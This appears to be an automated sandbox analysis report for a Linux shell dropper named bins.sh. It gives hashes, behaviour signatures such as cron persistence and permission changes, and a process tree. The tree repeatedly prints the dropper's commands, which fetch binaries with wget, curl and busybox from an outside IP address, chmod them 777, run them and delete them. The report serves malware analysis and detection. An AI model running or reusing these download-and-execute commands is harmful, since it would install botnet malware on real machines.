Analysis
max time kernel: 149s
max time network: 135s
platform: debian-9_armhf
resource: debian9-armhf-20240611-en
resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 28-10-2024 06:43
Static task: static1
Behavioral task behavioral1: sample bins.sh, resource ubuntu1804-amd64-20240611-en
Behavioral task behavioral2: sample bins.sh, resource debian9-armhf-20240611-en
Behavioral task behavioral3: sample bins.sh, resource debian9-mipsbe-20240611-en
Behavioral task behavioral4: sample bins.sh, resource debian9-mipsel-20240226-en
General
Target: bins.sh
Size: 10KB
MD5: 64720a9ea75f4d4f76e6f329663cda1e
SHA1: 6c72c54832e65dcc41c2eb6e80e88c4a693a3d1b
SHA256: aaa88dcb8ec822f62303b714fcfce67aaa1a41ec6d64f4d07b30ae5ace63551c
SHA512: 22d3d662b7452755e95392ad678e4cc68eb6a0e8b7bde0f70ac83388add270a64f2ec26c8376465c863135797f248af7a8871bca0ccb1e817703bafc710eed47
SSDEEP: 96:8B5XOnoEWWbaPOfYQGXTuEWWbaz4jQG9pTv9XY45wVNAnU1:8HXOnoEWWbaPOfYQGX9WWbaNGPbc2n8
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Renames itself 1 IoCs
Processes:
pid 820, process EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
File opened for modification: /var/spool/cron/crontabs/tmp.eKskNF (process: crontab)
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 28 IoCs
Checks CPU information, which can indicate whether the system is a virtual machine.
Processes:
File opened for reading: /proc/cpuinfo (process: curl)
-
Writes file to tmp directory 64 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:653
-
/bin/rm/bin/rm bins.sh2⤵PID:656
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY2⤵
- Writes file to tmp directory
PID:658
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:673
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY2⤵
- Writes file to tmp directory
PID:686
-
-
/bin/chmodchmod 777 20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY2⤵
- File and Directory Permissions Modification
PID:687
-
-
/tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY./20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY2⤵
- Executes dropped EXE
PID:688
-
-
/bin/rmrm 20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY2⤵PID:690
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h2⤵
- Writes file to tmp directory
PID:691
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:704
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h2⤵
- Writes file to tmp directory
PID:712
-
-
/bin/chmodchmod 777 OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h2⤵
- File and Directory Permissions Modification
PID:719
-
-
/tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h./OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h2⤵
- Executes dropped EXE
PID:720
-
-
/bin/rmrm OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h2⤵PID:723
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui2⤵
- Writes file to tmp directory
PID:724
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:730
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui2⤵
- Writes file to tmp directory
PID:738
-
-
/bin/chmodchmod 777 4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui./4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm 4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui2⤵PID:747
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z2⤵
- Writes file to tmp directory
PID:748
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z2⤵
- Writes file to tmp directory
PID:752
-
-
/bin/chmodchmod 777 kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z2⤵
- File and Directory Permissions Modification
PID:753
-
-
/tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z./kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z2⤵
- Executes dropped EXE
PID:754
-
-
/bin/rmrm kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z2⤵PID:756
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA2⤵
- Writes file to tmp directory
PID:757
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:766
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA2⤵
- Writes file to tmp directory
PID:773
-
-
/bin/chmodchmod 777 O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA2⤵
- File and Directory Permissions Modification
PID:777
-
-
/tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA./O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA2⤵
- Executes dropped EXE
PID:779
-
-
/bin/rmrm O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA2⤵PID:781
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie2⤵
- Writes file to tmp directory
PID:782
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:788
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie2⤵
- Writes file to tmp directory
PID:794
-
-
/bin/chmodchmod 777 uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie2⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie./uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie2⤵
- Executes dropped EXE
PID:798
-
-
/bin/rmrm uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie2⤵PID:800
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK2⤵
- Writes file to tmp directory
PID:801
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:802
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK2⤵
- Writes file to tmp directory
PID:803
-
-
/bin/chmodchmod 777 yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK2⤵
- File and Directory Permissions Modification
PID:804
-
-
/tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK./yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK2⤵
- Executes dropped EXE
PID:805
-
-
/bin/rmrm yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK2⤵PID:807
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG2⤵
- Writes file to tmp directory
PID:808
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:809
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG2⤵
- Writes file to tmp directory
PID:810
-
-
/bin/chmodchmod 777 3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG./3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG2⤵
- Executes dropped EXE
PID:812
-
-
/bin/rmrm 3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG2⤵PID:814
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS2⤵
- Writes file to tmp directory
PID:815
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS2⤵
- Writes file to tmp directory
PID:817
-
-
/bin/chmodchmod 777 EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS2⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS./EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:819 -
/bin/shsh -c "crontab -l"3⤵PID:821
-
/usr/bin/crontabcrontab -l4⤵PID:822
-
-
-
/bin/shsh -c "crontab -"3⤵PID:823
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:824
-
-
-
-
/bin/rmrm EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS2⤵PID:826
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv2⤵PID:830
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:831
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv2⤵
- Writes file to tmp directory
PID:832
-
-
/bin/chmodchmod 777 4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv2⤵
- File and Directory Permissions Modification
PID:833
-
-
/tmp/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv./4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv2⤵
- Executes dropped EXE
PID:834
-
-
/bin/rmrm 4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv2⤵PID:835
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC2⤵PID:836
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:837
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC2⤵
- Writes file to tmp directory
PID:838
-
-
/bin/chmodchmod 777 u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC2⤵
- File and Directory Permissions Modification
PID:839
-
-
/tmp/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC./u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC2⤵
- Executes dropped EXE
PID:840
-
-
/bin/rmrm u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC2⤵PID:841
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs82⤵PID:842
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs82⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:843
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs82⤵
- Writes file to tmp directory
PID:845
-
-
/bin/chmodchmod 777 2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs82⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8./2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs82⤵
- Executes dropped EXE
PID:848
-
-
/bin/rmrm 2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs82⤵PID:849
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF2⤵PID:850
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:851
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF2⤵
- Writes file to tmp directory
PID:852
-
-
/bin/chmodchmod 777 HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF2⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF./HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF2⤵
- Executes dropped EXE
PID:854
-
-
/bin/rmrm HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF2⤵PID:856
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p2⤵PID:857
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:858
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p2⤵
- Writes file to tmp directory
PID:859
-
-
/bin/chmodchmod 777 JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p./JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p2⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p2⤵PID:863
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs82⤵PID:864
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs82⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs82⤵
- Writes file to tmp directory
PID:866
-
-
/bin/chmodchmod 777 2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs82⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8./2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs82⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm 2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs82⤵PID:869
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS2⤵
- Writes file to tmp directory
PID:870
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS2⤵
- Writes file to tmp directory
PID:872
-
-
/bin/chmodchmod 777 EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS./EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS2⤵PID:875
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv2⤵PID:876
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv2⤵
- Writes file to tmp directory
PID:878
-
-
/bin/chmodchmod 777 4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv./4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm 4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv2⤵PID:881
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC2⤵PID:882
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC2⤵
- Writes file to tmp directory
PID:884
-
-
/bin/chmodchmod 777 u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC./u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC2⤵PID:887
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF2⤵PID:888
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF2⤵
- Writes file to tmp directory
PID:890
-
-
/bin/chmodchmod 777 HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF./HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF2⤵PID:894
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p2⤵PID:895
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p2⤵
- Writes file to tmp directory
PID:897
-
-
/bin/chmodchmod 777 JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p./JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p2⤵PID:901
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY2⤵PID:902
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY2⤵
- Writes file to tmp directory
PID:904
-
-
/bin/chmodchmod 777 20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY./20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm 20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY2⤵PID:908
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h2⤵PID:909
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:910
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h2⤵
- Writes file to tmp directory
PID:911
-
-
/bin/chmodchmod 777 OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h2⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h./OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h2⤵
- Executes dropped EXE
PID:913
-
-
/bin/rmrm OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h2⤵PID:915
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG2⤵PID:916
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG2⤵
- Writes file to tmp directory
PID:918
-
-
/bin/chmodchmod 777 3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG
./3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG
- Executes dropped EXE
PID:920
-
-
/bin/rm
rm 3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG
PID:922
-
-
/usr/bin/wget
wget http://87.120.126.196/bins/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui
PID:923
-
-
/usr/bin/curl
curl -O http://87.120.126.196/bins/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox
/bin/busybox wget http://87.120.126.196/bins/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui
- Writes file to tmp directory
PID:925
-
-
/bin/chmod
chmod 777 4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui
- File and Directory Permissions Modification
PID:926
-
-
/tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui
./4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui
- Executes dropped EXE
PID:927
-
-
/bin/rm
rm 4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui
PID:929
-
-
/usr/bin/wget
wget http://87.120.126.196/bins/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z
PID:930
-
-
/usr/bin/curl
curl -O http://87.120.126.196/bins/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z
- Checks CPU configuration
- Writes file to tmp directory
PID:931
-
-
/bin/busybox
/bin/busybox wget http://87.120.126.196/bins/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z
- Writes file to tmp directory
PID:932
-
-
/bin/chmod
chmod 777 kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z
- File and Directory Permissions Modification
PID:933
-
-
/tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z
./kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z
- Executes dropped EXE
PID:934
-
-
/bin/rm
rm kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z
PID:936
-
-
/usr/bin/wget
wget http://87.120.126.196/bins/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA
PID:937
-
-
/usr/bin/curl
curl -O http://87.120.126.196/bins/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA
- Checks CPU configuration
- Reads runtime system information
PID:938
-
-
/bin/busybox
/bin/busybox wget http://87.120.126.196/bins/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA
- Writes file to tmp directory
PID:939
-
-
/bin/chmod
chmod 777 O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA
- File and Directory Permissions Modification
PID:941
-
-
/tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA
./O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA
- Executes dropped EXE
PID:942
-
-
/bin/rm
rm O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA
PID:944
-
-
/usr/bin/wget
wget http://87.120.126.196/bins/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie
PID:945
-
-
/usr/bin/curl
curl -O http://87.120.126.196/bins/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie
- Checks CPU configuration
- Writes file to tmp directory
PID:947
-
-
/bin/busybox
/bin/busybox wget http://87.120.126.196/bins/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie
- Writes file to tmp directory
PID:948
-
-
/bin/chmod
chmod 777 uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie
- File and Directory Permissions Modification
PID:949
-
-
/tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie
./uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie
- Executes dropped EXE
PID:950
-
-
/bin/rm
rm uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie
PID:952
-
-
/usr/bin/wget
wget http://87.120.126.196/bins/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK
PID:953
-
-
/usr/bin/curl
curl -O http://87.120.126.196/bins/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK
- Checks CPU configuration
- Reads runtime system information
PID:954
-
-
/bin/busybox
/bin/busybox wget http://87.120.126.196/bins/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK
- Writes file to tmp directory
PID:955
-
-
/bin/chmod
chmod 777 yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK
- File and Directory Permissions Modification
PID:956
-
-
/tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK
./yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK
- Executes dropped EXE
PID:957
-
-
/bin/rm
rm yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK
PID:959
-
Network
MITRE ATT&CK Enterprise v15
Downloads